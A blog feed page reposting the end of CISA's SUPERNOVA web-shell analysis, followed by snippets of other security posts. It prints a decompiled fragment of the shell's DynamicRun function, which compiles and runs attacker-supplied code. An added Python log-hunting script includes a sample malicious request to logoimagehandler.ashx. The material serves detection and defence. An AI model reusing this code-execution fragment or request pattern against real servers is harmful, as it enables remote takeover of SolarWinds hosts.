    string.Join(Environment.NewLine, (IEnumerable<string>) Enumerable.Select<CompilerError, string>((IEnumerable<M0>) compilerResults.Errors.Cast<CompilerError>(), (Func<M0, M1>) (LogoImageHandler.u003Cu003Ec.u003Cu003E9__3_0 ?? (LogoImageHandler.u003Cu003Ec.u003Cu003E9__3_0 = new Func<CompilerError, string>((object) LogoImageHandler.u003Cu003Ec.u003Cu003E9, __methodptr(u003CDynamicRunu003Eb__3_0))))));
    Console.WriteLine(“error”);
    return compilerResults.Errors.ToString();
   }
   object instance = compilerResults.CompiledAssembly.CreateInstance(clazz);
   return (string) instance.GetType().GetMethod(method).Invoke(instance, (object[]) args);
}
–End DynamicRun Function–
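The two functions above give a defender a concrete web-log signature: the legitimate logo handler only ever needs the "id" parameter, while the trojanized ProcessRequest reads "codes", "clazz", "method" and "args". The following Python is an added example (not part of the CISA report or of SolarWinds code) that parses IIS W3C-format log lines and flags requests to logoimagehandler.ashx that carry any of those four parameters, or any parameter other than "id". The log lines, hostnames and IP addresses are constructed for the example; the field list mirrors a typical IIS "#Fields:" header and is an assumption about the deployment's logging configuration.

```python
"""Hunt for SUPERNOVA-style requests in IIS W3C logs (added example, not from the report)."""
from urllib.parse import parse_qs

HANDLER = "logoimagehandler.ashx"          # URI stem of the trojanized handler
SUPERNOVA_PARAMS = {"codes", "clazz", "method", "args"}  # parameters read by the patched ProcessRequest
LEGIT_PARAMS = {"id"}                      # the only parameter the genuine handler uses

# Constructed sample log in IIS W3C format; values are illustrative, not real observations.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2021-01-20 10:15:01 10.0.0.5 GET /Orion/logoimagehandler.ashx id=SitelogoImage 443 10.0.0.20 200
2021-01-20 10:15:02 10.0.0.5 GET /Orion/Login.aspx - 443 10.0.0.20 200
2021-01-20 10:16:44 10.0.0.5 GET /Orion/LogoImageHandler.ashx codes=using+System%3B&clazz=Payload&method=Run&args=x 443 198.51.100.7 200
2021-01-20 10:17:10 10.0.0.5 GET /Orion/logoimagehandler.ashx id=SiteNoclogoImage&foo=bar 443 10.0.0.21 200
"""


def parse_iis_w3c(text):
    """Return one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#"):          # other directives (#Software, #Date, ...)
            continue
        if fields is None:
            raise ValueError("log data appears before a #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):    # skip malformed or truncated lines
            continue
        records.append(dict(zip(fields, values)))
    return records


def classify(record):
    """Return 'supernova', 'anomalous' or None for a single parsed record."""
    stem = record.get("cs-uri-stem", "")
    if not stem.lower().endswith(HANDLER):   # IIS paths are case-insensitive
        return None
    query = record.get("cs-uri-query", "-")
    params = set()
    if query != "-":                          # IIS writes "-" for an empty query string
        # ASP.NET's Request[...] lookup is case-insensitive, so normalise key names
        params = {k.lower() for k in parse_qs(query, keep_blank_values=True)}
    if params & SUPERNOVA_PARAMS:
        return "supernova"
    if params - LEGIT_PARAMS:
        return "anomalous"
    return None


def hunt(text):
    """Scan a whole log and return (verdict, client_ip, uri_stem, query) for each hit."""
    hits = []
    for rec in parse_iis_w3c(text):
        verdict = classify(rec)
        if verdict:
            hits.append((verdict, rec["c-ip"], rec["cs-uri-stem"], rec["cs-uri-query"]))
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

One caveat worth keeping in mind: ProcessRequest reads the parameters through context.Request[...], which in ASP.NET also consults the POST body and cookies, and IIS logs record only the query string. A request that delivers "codes" in a form body would therefore not be caught by this log search; covering that path needs request-body logging at a reverse proxy or WAF in front of the Orion web server.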

Screenshots

Figure 1 – Screenshot of the modification.

02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1

Details
Name AssemblyInfo__.ini
Size 252 bytes
Type data
MD5 a73fd263da660c56650426eff8299c7d
SHA1 ab9ed07e59e1e284914ad6d6be74a0985dff703a
SHA256 02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1
SHA512 9c65aecd80510244a16335a925b2b3b722d56a1c9fdc06267aee5c576b4346d9e60c03bfbf3c67729c6bd5d0fc3511fb479be5aa662cd322bd2f238129a28bd0
ssdeep 6:cP6SlI9Dol1BnUfKr+2kiRWa6SlI9Dol1Bne:s1qD41hKKr+2NRWa1qD41he
Entropy 3.389300
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file contains the following text:

–Begin text–
App_Web_logoimagehandler.ashx.b6031896,0.0.0.0,, file:///C:/InetPub/SolarWinds/bin/App_Web_logoimagehandler.ashx.b6031896.dll
–End text–

Relationship Summary

290951fcc7… Contains c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71
c15abaf51e… Contained_Within 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • January 27, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.


The post AR21-027A: MAR-10319053-1.v1 – Supernova appeared first on Malware Devil.



https://malwaredevil.com/2021/01/27/ar21-027a-mar-10319053-1-v1-supernova/?utm_source=rss&utm_medium=rss&utm_campaign=ar21-027a-mar-10319053-1-v1-supernova

Tuesday, January 26, 2021

Phishing & Malspam with Leaf PHPMailer

It’s common knowledge that attackers often use email as a delivery mechanism for their malicious activity — which can range from enticing victims to click a phishing URL to getting them to download a malicious attachment.

To support these activities, attackers seek out tools that assist in the mass sending of malspam (malicious spam) emails from a compromised website. PHP scripts like Leaf PHPMailer are well suited for this task.

Hacktool Analysis: Leaf PHPMailer

Leaf PHPMailer is a PHP mailer hacktool that lets an attacker send out large amounts of malspam emails from a compromised website’s web server.

Continue reading Phishing & Malspam with Leaf PHPMailer at Sucuri Blog.

The post Phishing & Malspam with Leaf PHPMailer appeared first on Security Boulevard.





https://malwaredevil.com/2021/01/26/phishing-malspam-with-leaf-phpmailer/?utm_source=rss&utm_medium=rss&utm_campaign=phishing-malspam-with-leaf-phpmailer

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...